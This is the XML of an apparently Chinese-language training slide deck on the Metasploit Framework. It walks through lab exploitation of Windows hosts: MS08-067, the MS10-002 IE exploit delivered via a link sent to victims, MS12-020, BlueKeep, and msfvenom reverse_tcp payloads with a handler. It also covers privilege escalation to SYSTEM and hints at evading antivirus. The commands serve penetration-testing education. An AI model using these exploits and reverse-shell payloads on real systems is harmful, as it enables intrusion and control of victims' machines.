            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>漏洞利用模块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279041" y="379828"/>
            <a:ext cx="9305925" cy="89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Metasploit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常用漏洞利用命令（一）</a:t>
            </a:r>
            <a:b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</a:b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963" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="359784" y="1278658"/>
            <a:ext cx="10972800" cy="53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浏览器漏洞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远程代码执行漏洞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服务漏洞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本地提权漏洞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&lt;name&gt;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用指定关键字搜索可利用漏洞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use &lt;exploit name&gt;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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>漏洞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show options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显示选项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&lt;OPTION NAME&gt; &lt;option&gt;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设置选项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show payloads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显示装置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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="359784" y="419100"/>
            <a:ext cx="10972800" cy="621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arp_sweep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指定网段扫描在线主机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smb_version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搜索某个主机存在的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漏洞、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root@kali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:~/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桌面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nmap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--script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-vuln-* 192.168.31.23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ms17-010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进去以后使用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rdesktop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连接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如何在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linux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开启连接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3389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？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			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apt-get install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rdesktop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			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rdesktop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ip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			3389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强制登录器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			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windows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下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mstsc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			cve_2019_0708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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="200664" y="514905"/>
            <a:ext cx="11403741" cy="71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Xp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测试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root@kali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:~/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桌面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#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nmap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--script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-vuln-* 192.168.149.143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08-067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Use 0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rhosts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192.168.149.143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设置攻击载荷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设置对应攻击的的操作系统版本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target 34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payload windows/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meterpreter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reverse_tcp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反弹建立回话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攻击成功之后返回一个攻击载荷 返回到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meterpreter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msf5 exploit(windows/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/ms08_067_netapi) &gt; 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lhost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192.168.149.142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msf5 exploit(windows/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smb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/ms08_067_netapi) &gt; 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lport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1122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见后面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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="394129" y="461639"/>
            <a:ext cx="11403741" cy="71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查看进程，然后迁移到系统进程，保证会话稳定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Ps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进程迁移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migrate 1000(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进程对应的编号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run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vnc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远程监控管理员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shell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远程调用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cmd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background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挂起到后台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sessions –l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查看挂起的会话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sessions –I 2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使用挂起的会话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236657" y="504202"/>
            <a:ext cx="9796462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Metasploit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常用漏洞利用命令（二）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987" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph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show targets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显示目标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(os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版本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set TARGET &lt;target number&gt;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设置目标版本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exploit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开始漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>攻击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sessions -l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列出会话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sessions -i &lt;ID&gt;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选择会话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sessions -k &lt;ID&gt;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结束会话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&lt;ctrl&gt; z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把会话放到后台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&lt;ctrl&gt; c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结束会话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328305" y="652370"/>
            <a:ext cx="9175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/>
          <a:p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</a:rPr>
              <a:t>Metasploit </a:t>
            </a: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</a:rPr>
              <a:t>常用漏洞利用命令（三）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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="663575" y="1960245"/>
            <a:ext cx="10972800" cy="29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show auxiliary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显示辅助模块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use &lt;auxiliary name&gt;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使用辅助模块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set &lt;OPTION NAME&gt; &lt;option&gt;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设置选项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run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运行模块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3865" y="685800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/>
              <a:t>测试漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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2387" y="1778178"/>
            <a:ext cx="10665567" cy="42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MS10_002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MS10_018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MS12-020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MS10-046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MS08_067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MS12-004</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Ms17-010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Linux samba漏洞利用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/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="57150" y="1617663"/>
            <a:ext cx="12106275" cy="4362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7505" indent="-357505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MS10-0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charset="-122"/>
              </a:rPr>
              <a:t> IE漏洞利用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入侵实战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9255" y="505460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zh-CN"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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37262" y="4669119"/>
            <a:ext cx="10218737" cy="14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zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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88" y="1874512"/>
            <a:ext cx="7210425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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="394129" y="461639"/>
            <a:ext cx="11403741" cy="719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基于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ie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浏览器的漏洞利用  MS10_002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需要生成一个链接让人去访问才能生效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search ms10-002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0  exploit/windows/browser/ms10_002_aurora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use 0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srvhost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192.168.149.142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设置本地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ip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-&gt;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目的是为了让别人访问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192.168.149.142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srvport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8080	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设置本地端口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payload windows/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meterpreter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reverse_tcp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设置漏洞执行成功以后建立回连的代码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lhost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192.168.149.142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设置回连的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ip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监听后就能如果受害者请求就能够建立连接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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>lport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 1123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设置回连的端口号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run  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</a:rPr>
              <a:t>生成链接 发送给别人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</a:rPr>
              <a:t>http://192.168.149.142:8080/IVnNv9pb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1646" y="779389"/>
            <a:ext cx="5609513" cy="6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dirty="0"/>
              <a:t>ms10_002漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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22823" y="2385108"/>
            <a:ext cx="7448609" cy="30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use windows/browser/ms10_002_aurora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payload windows/meterpreter/reverse_tcp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show options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SRVPORT 80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URIPATH /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LHOST 192.168.2.128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LPORT 444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exploit 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933450"/>
            <a:ext cx="12192000" cy="4525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3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS10-018 IE漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵实战</a:t>
            </a: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263748" y="589660"/>
            <a:ext cx="10972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668BE4"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞描述：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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Microsoft IE畸形对象操作内存破坏漏洞(MS10-018)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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受影响系统：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1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Microsoft Internet Explorer 7.0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Microsoft Internet Explorer 6.0 SP1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Microsoft Internet Explorer 6.0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endParaRPr lang="en-US" altLang="zh-CN" sz="18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Internet Explorer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是</a:t>
            </a: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操作系统中默认捆绑的</a:t>
            </a:r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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1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浏览器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endParaRPr lang="zh-CN" altLang="en-US" sz="20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Internet Explorer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通过使用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iepeers.dll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组件提供对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Web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文件夹和打印的支持，该组件中存在释放后使用错误。如果用户加载了特制的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HTML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文档或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Office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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件，未经认证的远程攻击者就可以导致拒绝服务或执行任意代码。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  <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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508000" y="22860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/>
              <a:t>受影响系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155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11217275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062038"/>
            <a:ext cx="1118711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920750"/>
            <a:ext cx="11220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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>实战过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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pic>
        <p:nvPicPr>
          <p:cNvPr id="5120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9931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048000"/>
            <a:ext cx="99187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10972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1026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8534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38394" y="187325"/>
            <a:ext cx="1825625" cy="46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zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill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1988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6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11074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1117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5650" y="796480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专业术语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59678" y="1999716"/>
            <a:ext cx="10554471" cy="428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渗透攻击（exploit）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测试者利用系统，程序，或服务的漏洞进行攻击的一个过程。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攻击载荷（payload）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攻击者在目标系统上执行的一段攻击代码，该代码具有返弹连接，创建用户，执行其他系统命令的功能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hellcode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包含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payload)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在目标机器上运行的一段机器指令，成功执行后会返回一个shell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模块（module）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是指Metasploit框架中所使用的一段软件代码组件。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监听器（listener）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监听器是metasploit中用来等待介入网络连接的组件。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413068" y="548640"/>
            <a:ext cx="93249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Metasploit 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常用渗透命令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7347" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="1401763"/>
            <a:ext cx="1097280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./msfconsole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字符下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Console</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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973263"/>
            <a:ext cx="10221912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Snagit_PPTCE4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1463"/>
            <a:ext cx="12192000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263748" y="589660"/>
            <a:ext cx="10972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一般什么时候需要系统蓝屏？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有的时候远程控制到了主机将木马植入程序开机启动运行，所以有的时候需要重启一下机器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search ms12-020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use 0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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 192.168.149.1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run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263748" y="589660"/>
            <a:ext cx="10972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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cve_2019_0708_bluekeep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search 0708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use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>rdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/cve_2019_0708_bluekeep_rce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</a:rPr>
              <a:t>利用不成功 条件苛刻 可以参照网上帖子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101600" y="0"/>
            <a:ext cx="11109548" cy="76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Window7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提权例子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、生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload 1.exe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 err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>桌面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a: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err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=“192.168.149.142” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=1122 -f exe &gt; 1.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_tcp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指定使用的协议 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-f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指定输出位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exe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类型文件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+mn-ea"/>
              </a:rPr>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>建立端口侦听等待</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接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use exploit/multi/handler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set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_tcp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msf5 exploit(multi/handler) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 192.168.149.142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 err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> =&gt; 192.168.149.142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msf5 exploit(multi/handler) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 1122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run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前提是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>已经拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行，反弹建立会话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Windows 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>记得关闭防火墙，会报毒，关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn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+mn-ea"/>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.exe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挂起，提升到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>劫持会话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background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验证当前系统未打补丁的漏洞，然后进行利用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见后面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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0"/>
            <a:ext cx="10963052" cy="826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search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sug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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>post/multi/recon/local_exploit_suggester</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>options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set session 1  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置需要进行漏洞对比的会话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前提是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>已经拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行，反弹建立会话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search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>suggester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用检索目标系统有哪些漏洞补丁没有打上的  将没有打补丁的漏洞与可以利用的漏洞对比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也可以使用自动对比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)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search m16-032/ms15-051 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>都没有成功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search 8120 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成功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set session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置之前的会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id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show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>targetsset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置攻击的目标系统版本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use Windows 7 x64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Run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 err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>getuid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Server username: NT AUTHORITY\SYSTEM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实战中需要考虑环境、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en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>waf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、杀软会拦截上传 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--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需要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bypass av(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实际就是免杀绕过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实际用得比较多的 免杀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payload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上传到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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>powershell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进行无文件攻击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可以绕过一些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360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杀软、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empire ps1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也可以免杀绕过一些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支持 、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+mn-ea"/>
              </a:rPr>
              <a:t>烂土豆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(m16-075)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
